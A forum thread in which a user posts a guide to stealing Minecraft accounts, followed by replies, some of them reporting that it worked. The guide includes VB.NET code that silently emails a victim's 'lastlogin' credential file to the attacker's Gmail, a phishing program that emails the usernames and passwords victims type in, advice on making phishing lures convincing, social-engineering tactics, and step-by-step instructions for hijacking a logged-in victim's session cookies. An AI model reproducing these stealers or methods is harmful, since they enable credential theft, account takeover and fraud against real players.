11-03-2011, 10:45 PM #1
(adsbygoogle = window.adsbygoogle || []).push({});
You must login or register to view this content.

-This guide is now completely outdated. I do not plan on ever updating it.
-Removed the videos. Don't plan on making more anytime soon.
-Removed space that was causing problems for so many. Not Happy or Sad
-Updated FAQ & other small edits.
-Adding a new section: Cookie Session Stealing. A truly original Minecraft hack I found.
-Minecraft Account Hacking - Part 3 was uploaded.

-Minecraft Account Hacking - Part 2 was uploaded.
-Version two of the video was uploaded.
-Just finished the video. Uploading now.
-The much needed FAQ section has been added.

[/SIZE]

Hacking Minecraft accounts is something I have been perfecting for a while now. After a ton of experience and research I have narrowed down the most effective ways to "hack" a Minecraft account. This guide is good for either targeting someone or for just gathering alternate accounts. It is also the next best thing to using a account cracker. Lets begin.

This guide is now outdated. Nothing to see here unless you want a history lesson.

Obtaining a "Lastlogin" File

The key to stealing any Minecraft account is obtaining a file named "lastlogin". This file is located in the .minecraft folder which contains all of the games files.

If you don't have minecraft on your computer you will need to use the cracked version in the download. (You will find out why later.)

Method #1

The first way you can obtain a lastlogin file is to simply search it on the internet. Some people foolishly post their .minecraft folder on the internet for several reasons without removing their lastlogin file.

Some things you can search to find a .minecraft folder:

• Premodded Minecraft Folder
  • Free .minecraft folder
  • Play minecraft for free with this last loginfile

Method #2

The social engineering method. This method worked well for me. By befriending people on the You must login or register to view this content. you can convince them to send you their .minecraft folder by saying you will...

• Make incompatible mods work together
  • Mod their .minecraft folder
  • That you want to try out their modded .minecraft folder
  • ect...

The great thing about this is that you don't even need the greatest social engineering skills. You only need to know what your talking about. So brush up on your info about the mechanics of the game.

Method #3

The last method is using a program that steals the file for you. Here is an example code that you may use.

VB.NET Example

Imports System.Net.Mail
Public Class Form1
Dim smtp As New SmtpClient
Dim mail As New MailMessage

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

Dim MyMailMessage As New MailMessage()
Try
Dim Attch As Net.Mail.Attachment = New Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\lastlogin")
MyMailMessage.Attachments.Add(Attch)
MyMailMessage.From = New MailAddress([COLOR="#FF0000"]"[email protected]"[/COLOR])
MyMailMessage.To.Add([COLOR="#FF0000"]"[email protected]"[/COLOR])
MyMailMessage.Subject = ("LastLoginFile")
MyMailMessage.Body = (" ")
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential([COLOR="#FF0000"]"[email protected]"[/COLOR], [COLOR="#FF0000"]"Password"[/COLOR])
SMTP.Send(MyMailMessage)
Catch ex As Exception
End Try
End Sub

End Class

How to use the "lastlogin" file to steal their account
[/COLOR]

Mine Pass
Created by: Unknown

Now in the download you should see a cracked minecraft launcher. This will give you the game. Then go You must login or register to view this content. to download the original launcher so you can log in. It will be under "Download Minecraft". (If you already have the game you can skip this step.)

Now you need to take the "lastlogin" file you have and place it in your .minecraft folder. Which is located in in your %AppData% folder.

Now open up the non cracked launcher. You should see this:
(If not then the user was smart enough to leave it blank.)

Now open up Mine Pass in the download. Then click log in on the launcher. Mine Pass will do its job and show you this:

MC Last Login Decrypter (LLD)
Created by: Wertyl11

This is very simple just run the .jar and it will display the information. May not work for everyone.

Now you have the information you need to take the account for your self. If your lucky you can search the victims user name, find their email and take it.

Making an Effective Phisher
[/COLOR]

These ideas can be applied to Method #3 of Part 1.

This method requires that you know VB, or at least how to use a code given to you. This method, even though it's illegal, can be a effective. Yes its the infamous phisher.

When you make a phisher on the minecraft forums, or where ever, make it look real. Have tons of pictures and don't forget to add "why it may not work for every one". This way no suspicion comes about. Also make a second account and reply to your phishers thread saying it was great. This first post will be enough for many to download it and to fall for your trap. Lastly be creative. Think big! It doesn't have to work. Just has to look like it does.

Here is a code you can use:

Pass is what you would use for a text box.

Imports System.Net.Mail
Public Class Form1
Dim smtp As New SmtpClient
Dim mail As New MailMessage

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs)

Dim MyMailMessage As New MailMessage()
Try
MyMailMessage.From = New MailAddress("[COLOR="#FF0000"]Your Gmail Here[/COLOR]@gmail.com")
MyMailMessage.To.Add("[COLOR="#FF0000"]Your Gmail Here[/COLOR]")
MyMailMessage.Subject = User.Text
MyMailMessage.Body = Pass.Text
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("[COLOR="#FF0000"]Your Gmail Here[/COLOR]", "[COLOR="#FF0000"]Your Gmail's Password Here[/COLOR]")
SMTP.Send(MyMailMessage)
Pass.Text = ""
Catch ex As Exception
End Try
End Sub

Again this does require that you have some programming skills.

Minecraft Browser Session Stealing
[/COLOR]

The concept of session stealing with cookies is not a new one, but as far as minecraft goes this is new ground. I will be adding more as I discover more. For this the target must be logged into minecraft from their browser. This can be applied to other browsers, but today I will be showing you how to do it with Google Chrome.

From Target's Computer

1. First make sure the target is logged in.
  2. Then go to the Chrome Web Store.
  3. Search and add the Extension "Edit This Cookie".
  4. Then go to minecraft.net where the target should still be logged in.
  5. Click on the cookie in the top right hand corner.
  6. Click export cookies. It will copy the cookies to your clip board.
  7. Now paste those cookies into a txt file on a flash drive, or email it to yourself.
  8. Now you need to be on your computer. Install that same extension into chrome.
  9. Now click the cookie and select import. Paste the cookies there.
  10. Now click Submit cookie changes.
    You may need to refresh the page.

11. Now you should be logged into their account. Where you are free to play the game under their account.

Please Read:

If the person logs out of minecraft on their computer before you can login, then the cookies will be invalid.

FAQ

Technical FAQ

Can you hack an account for me MagicalMonkey? No.

Mine Pass just says it scanning and does nothing else. Why won't it work? You need to press log in.

Mine Pass does not display a password/username. Why? Because the owner of the account did not select remember password, or it is simply a blank last login file.

The account information I have does not work? Probably because the owner changed his information.

I get weird results with Mine Pass when I login. Why? I'll just say this. If you can't log into Minecraft with just the last log in file alone, then the file is no good and contains incorrect information.

I can not find my .minecraft folder. Why? Probably because Minecraft is not on your computer. So use the cracked launcher provided in the download in order to get a free copy.

Can I have the project folder for the Lastlogin file stealer/Phisher? No. I refuse to spoon feed any one. I have literally given you the entire code and all you need to do is copy and paste.

I can't find any last login files through a google search. Why not? I created this thread over a year ago just before the Minecraft Account Hacking Boom started. (Obviously, I have continued to update it quite often.) At the time there were less MC account hackers out there. So it was easier to find things like this. So the chances that you will find one laying around the internet any more is slim, but it doesn't mean it can't happen.

Irrelevant FAQ

MagicalMonkey, I don't like you, because you show people how to hack Minecraft accounts. Can you stop now!? No. lol

MagicalMonkey, I bet you're just a skid who copied all of this from someone else. Unlike a lot of very unintelligent people, I do not plagiarize other people's work. If I borrowed something from someone else, I posted it here.

Hey I think you are awesome. Is there anyway I can thank-you? Yeah! Let me know that I helped and share it with your friends. I would also like it if you thanked KronosCloud for making the MC ToolBox.

Downloads

Download the Minecraft Account Hackers Tool Kit You must login or register to view this content..

Includes a cracked version of Minecraft, LLD and MinePass.

Minecraft Toolbox
By You must login or register to view this content.

Download the You must login or register to view this content.. It is basically all of the programs put into one tool. I highly suggest you try this first.

Direct Download Link: You must login or register to view this content.
Google Chrome will set off a false positive.

Virus Scan: You must login or register to view this content.

Do not contact me about sending you the link for the downloads. Register here at NGU to get all of the links, videos and downloads. It is free to sign up and it is a great community. If you do however try to contact me about getting the downloads without signing up for NGU I will ignore you. I get asked far too often and wanted to state this before it got out of hand.[/CENTER]
Last edited by MagicalMonkey ; 03-05-2014 at 10:26 PM.

The following 21 users say thank you to MagicalMonkey for this useful post:

CraigMurray95, Curt, FruitBurst, IVisionsI, jobush50, LEzStarz, mister_k, Mr Grumpy, Mr. Star, Ninja, R3bUG-_M0Dz_-, Rasil23, Repetition, Taylor, wiseguy48, xChidori, xSoulEdge, Ziom230
07-11-2012, 04:27 PM #92
Originally posted by MagicalMonkey View Post
Who says you have to find one. You could always make a program to steal it for you. Smile

what program is this ?
07-11-2012, 04:29 PM #93
Originally posted by Hickey View Post
what program is this ?

Did you read the post? There is a whole section that shows you how to make your own last log in stealer.
07-16-2012, 04:09 AM #94
TacticalDuke
Do a barrel roll!
does this actually work???
07-17-2012, 12:32 AM #95
Originally posted by TacticalDuke View Post
does this actually work???

Why don't you ask the 16 people who thanked it and oh yeah the 20,000+ NGU users who viewed it. Smile

P.S. Thank-you everyone for helping me get this far and making my guide one of the most popular on the internet. <3
07-21-2012, 08:33 AM #96
Thanks for sharing bro !!!
07-22-2012, 10:09 PM #97
Taaco
Keeper
Hmm. Cool.
07-23-2012, 05:35 AM #98
forget2rembr
I am error
Worked for me, got 2 of my "friends" accounts.
07-23-2012, 06:52 AM #99
Fresh Boi
Do a barrel roll!
Thanks for sharing, nice tutorial Winky Winky
07-23-2012, 03:38 PM #100
The toolbox opens for like 10 seconds before closing and whenever I run minepass, after I open minecraft, it doesn't give me a username or password.

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo